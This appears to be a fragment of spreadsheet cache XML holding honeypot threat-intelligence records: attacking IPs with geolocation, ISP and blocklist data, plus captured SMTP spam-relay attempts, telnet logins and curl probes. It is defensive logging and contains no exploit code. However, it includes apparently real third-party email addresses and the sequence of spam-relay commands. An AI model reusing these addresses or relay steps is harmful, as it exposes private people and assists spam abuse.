  <r>
    <x v="1793"/>
    <x v="1793"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T18:34:10"/>
    <d v="2025-02-28T20:46:01"/>
    <d v="2025-04-14T18:34:10"/>
    <n v="282"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Email Spoofing&amp;&amp;Spam Message Body"/>
    <s v="medium"/>
    <s v="SMA-LAB_SMTP_H13&amp;&amp;SMA-LAB_SMTP_HC1"/>
    <s v="25&amp;&amp;3389"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="SC"/>
    <s v="Seychelles"/>
    <s v="16"/>
    <s v="La Rivière Anglaise"/>
    <s v="NA"/>
    <s v="Victoria"/>
    <s v="241131"/>
    <s v="NA"/>
    <s v="-4.62113"/>
    <s v="55.4522"/>
    <s v="401109"/>
    <s v="Zhongguancun LLC"/>
    <s v="Zhongguancun LLC"/>
    <s v="business"/>
    <s v="internet secuirty Zhongguanchun"/>
    <s v="2017-02-07"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'LOGIN', 'command': 'AUTH', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'from:&lt;spameri@tiscali.it&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'to:&lt;spameri@tiscali.it&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '109.123.229.33_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Sat, 1 Mar 2025 07:13:52 -0800_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;b.a.n.k80@outlook.com&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;aurashipllc@aol.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;janetdifiore00@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;o.f.f.i.c.e00@hotmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;NA&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '95.164.21.98_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Fri, 14 Mar 2025 00:04:13 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '45.14.244.111_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Fri, 4 Apr 2025 04:10:40 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;info@tianqixuda.com&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;mrtmsmith809@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;sgreenstarexpress@outlook.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;ShukhratYakubovich@outlook.com&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;mukhamederovshukhraty@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;kenan.imirzaliolu@yahoo.com&gt;', 'command': 'RCPT', 'data': 'None'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c4fb:5c0f"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low&amp;&amp;Medium&amp;&amp;High"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1794"/>
    <x v="1794"/>
    <s v="NA&amp;&amp;S01069404e3e42776.vc.shawcable.net"/>
    <x v="0"/>
    <d v="2025-04-14T18:30:04"/>
    <d v="2025-04-14T14:53:48"/>
    <d v="2025-04-14T18:30:04"/>
    <n v="14"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H41"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="CA"/>
    <s v="Canada"/>
    <s v="BC"/>
    <s v="British Columbia"/>
    <s v="Metro Vancouver Regional District"/>
    <s v="Vancouver"/>
    <s v="6173331"/>
    <s v="NA"/>
    <s v="49.2497"/>
    <s v="-123.119"/>
    <s v="6327"/>
    <s v="Shaw Communications Inc."/>
    <s v="Shaw Communications Inc."/>
    <s v="residential"/>
    <s v="Shaw Communications Inc."/>
    <s v="2010-10-28"/>
    <s v="SHAW-COMM"/>
    <s v="2012-03-02"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="1999-11-05 20:23:22"/>
    <s v="2025-11-05 20:23:22"/>
    <s v="2025-02-20 16:03:56"/>
    <s v="['A1-220.AKAM.NET', 'A3-64.AKAM.NET', 'A6-65.AKAM.NET', 'A8-66.AKAM.NET', 'A9-67.AKAM.NET', 'NS7NOCG.SHAWCABLE.NET', 'NS8SOCG.SHAWCABLE.NET', 'NS9HTOK.SHAWCABLE.NET']"/>
    <s v="WEBNAMES.CA INC"/>
    <s v="['clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'clientTransferProhibited']"/>
    <s v="Rogers Communications Canada Inc."/>
    <x v="29"/>
    <s v="NA"/>
    <s v="333 Bloor Street East"/>
    <s v="::ffff:3244:1413"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1795"/>
    <x v="1795"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T18:14:53"/>
    <d v="2025-04-14T18:14:53"/>
    <d v="2025-04-14T18:14:53"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Connaught Lane)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6306"/>
    <s v="77.2239"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75eb:39c5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1796"/>
    <x v="1796"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T18:13:32"/>
    <d v="2025-04-14T18:13:32"/>
    <d v="2025-04-14T18:13:32"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:560d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1797"/>
    <x v="1797"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T18:11:54"/>
    <d v="2024-12-23T16:36:00"/>
    <d v="2025-04-14T18:11:54"/>
    <n v="38"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H38"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="FL"/>
    <s v="Florida"/>
    <s v="Miami-Dade County"/>
    <s v="Medley"/>
    <s v="4163952"/>
    <s v="33178"/>
    <s v="25.8597"/>
    <s v="-80.3723"/>
    <s v="7922"/>
    <s v="Comcast Cable Communications, LLC"/>
    <s v="Comcast Cable Communications"/>
    <s v="residential"/>
    <s v="Tropical Shipping"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1718:add6"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1798"/>
    <x v="1798"/>
    <s v="NA&amp;&amp;1-34-94-21.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-14T18:11:42"/>
    <d v="2023-12-04T00:53:00"/>
    <d v="2025-04-14T18:11:42"/>
    <n v="542"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H20"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;15572&amp;&amp;23&amp;&amp;42216&amp;&amp;42231&amp;&amp;42269&amp;&amp;42250&amp;&amp;NA&amp;&amp;9100"/>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NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:122:5e15"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1799"/>
    <x v="1799"/>
    <s v="122-116-55-232.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-14T18:11:31"/>
    <d v="2024-01-24T17:33:43"/>
    <d v="2025-04-14T18:11:31"/>
    <n v="875"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H35"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;38515&amp;&amp;23&amp;&amp;NA&amp;&amp;9100"/>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login&amp;&amp;connection&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7a74:37e8"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1800"/>
    <x v="1800"/>
    <s v="59-126-197-24.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-14T18:10:50"/>
    <d v="2023-11-26T08:24:19"/>
    <d v="2025-04-14T18:10:50"/>
    <n v="462"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H30"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;38740&amp;&amp;80&amp;&amp;23&amp;&amp;9100&amp;&amp;3285&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GET&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7e:c518"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1801"/>
    <x v="1801"/>
    <s v="59-127-131-73.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-14T18:10:41"/>
    <d v="2024-09-11T03:31:00"/>
    <d v="2025-04-14T18:10:41"/>
    <n v="256"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_SSH_H21&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H43&amp;&amp;SMA-LAB_TELNET_H9"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;80&amp;&amp;9100&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GET&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7f:8349"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1802"/>
    <x v="1802"/>
    <s v="114-34-85-96.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-14T18:10:33"/>
    <d v="2024-12-27T02:35:01"/>
    <d v="2025-04-14T18:10:33"/>
    <n v="440"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5"/>
    <s v="23&amp;&amp;NA&amp;&amp;9100&amp;&amp;80&amp;&amp;12848"/>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login&amp;&amp;connection&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
